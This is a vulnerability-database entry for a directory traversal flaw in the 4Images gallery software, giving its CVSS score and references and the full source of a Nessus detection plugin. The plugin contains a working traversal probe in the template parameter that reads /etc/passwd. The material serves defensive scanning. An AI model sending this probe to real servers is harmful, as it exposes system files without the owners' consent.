Vulnerabilities > CVE-2006-0899 - Remote File Include vulnerability in 4images

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL

Summary

Directory traversal vulnerability in index.php in 4Images 1.7.1 and earlier allows remote attackers to read and include arbitrary files via ".." (dot dot) sequences in the template parameter.

Vulnerable Configurations

Part Description Count
Application
4Images
1

Exploit-Db

description: 4Images <= 1.7.1 (Local Inclusion) Remote Code Execution Exploit. CVE-2006-0899. Webapps exploit for php platform
file: exploits/php/webapps/1533.php
id: EDB-ID:1533
last seen: 2016-01-31
modified: 2006-02-26
platform: php
port:
published: 2006-02-26
reporter: rgod
source: https://www.exploit-db.com/download/1533/
title: 4Images <= 1.7.1 Local Inclusion Remote Code Execution Exploit
type: webapps

Nessus

NASL family: CGI abuses
NASL id: 4IMAGES_171_DIRECTORY_TRAVERSAL.NASL
description: 4Images is installed on the remote system. It is an image gallery management system. The installed application does not validate user-input passed in the 'template' variable of the 'index.php' file.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 21020
published: 2006-03-06
reporter: This script is Copyright (C) 2006-2018 Ferdy Riphagen
source: https://www.tenable.com/plugins/nessus/21020
title: 4Images <= 1.7.1 index.php template Parameter Traversal Local File Inclusion
code
#
# Script Written By Ferdy Riphagen 
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#
# Original advisory / discovered by : 
# https://web.archive.org/web/20060420020647/http://retrogod.altervista.org/4images_171_incl_xpl.html
#


include("compat.inc");

# Registration block: when the scanner loads the plugin with 'description'
# set, only the metadata below is published and the script exits; the live
# check further down never runs in that mode.
if (description) {
 script_id(21020);
 script_version("1.15");

 # Same CVE and Bugtraq id as the advisory this plugin detects.
 script_cve_id("CVE-2006-0899");
 script_bugtraq_id(16855);

 script_name(english:"4Images <= 1.7.1 index.php template Parameter Traversal Local File Inclusion");
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to
directory traversal attacks." );
 # Report text shown to the user; the 'template' parameter named here is the
 # one the check below actually exercises.
 script_set_attribute(attribute:"description", value:
"4Images is installed on the remote system.  It is an image gallery
management system. 

The installed application does not validate user-input passed in the
'template' variable of the 'index.php' file.  This allows an attacker
to execute directory traversal attacks and display the content of
sensitive files on the system and possibly to execute arbitrary PHP
code if he can write to local files through some other means." );
 script_set_attribute(attribute:"see_also", value:"http://www.4homepages.de/forum/index.php?topic=11855.0" );
 script_set_attribute(attribute:"see_also", value:"https://secuniaresearch.flexerasoftware.com/advisories/19026/" );
 # Remediation: the fixed release is 1.7.2; the first see_also link carries
 # the vendor's interim patch for index.php.
 script_set_attribute(attribute:"solution", value:
"Upgrade to 4Images version 1.7.2 or sanitize the 'index.php' file as
advised by a forum post (see first URL)." );
 # CVSS2 base vector AV:N/AC:L/Au:N/C:P/I:P/A:P is the 7.5 HIGH score;
 # temporal E:F records that a functional public exploit exists.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/03/06");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/26");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 summary["english"] = "Check if 4Images is vulnerable to directory traversal flaws";
 script_summary(english:summary["english"]);

 # ACT_ATTACK: the check phase sends a real traversal request and inspects
 # the response body (see the foreach loop below) rather than matching a
 # version banner.
 script_category(ACT_ATTACK);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2006-2020 Ferdy Riphagen");

 # 'script_dependencie' is the legacy NASL spelling; kept as-is.
 # The plugin is skipped when CGI scanning is disabled and, presumably, only
 # runs where an earlier plugin recorded PHP on the target (KB key www/PHP).
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");
include("misc_func.inc");

# Target selection: pick the web port, bail out if it is closed or cannot
# serve PHP, then build the list of directories to probe.
port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);

# Default to the CGI directories already discovered; in thorough mode also
# try the two common 4images install paths (make_list flattens the nested
# list, list_uniq drops duplicates).
dirs = make_list(cgi_dirs());
if (thorough_tests) {
  dirs = list_uniq(make_list("/4images", "/gallery", dirs));
}

# Detection: for each candidate directory, confirm the front page identifies
# as 4images, then issue the traversal request and look for /etc/passwd
# content in the reply. A host with no reply at all ends the plugin.
foreach d (dirs) {
  page = http_get_cache_ka(item:strcat(d, "/index.php"), port:port);
  if (page == NULL) exit(0);

  # Only gallery front pages get the probe; skip anything else quietly.
  if (!egrep(pattern:"Powered by.+4images", string:page)) continue;

  # Same probe as the original check: eight-level traversal in 'template'
  # plus a trailing null byte.
  probe = "../../../../../../../../etc/passwd";
  url = strcat(d, "/index.php?template=", probe, "%00");
  body = http_keepalive_send_recv(data:http_get(item:url, port:port), port:port, bodyonly:TRUE);
  if (body == NULL) exit(0);

  # A root passwd entry in the body is the evidence that the file was
  # included; report and stop.
  if (egrep(pattern:"root:.*:0:[01]:.*:", string:body)) {
    security_hole(port);
    exit(0);
  }
}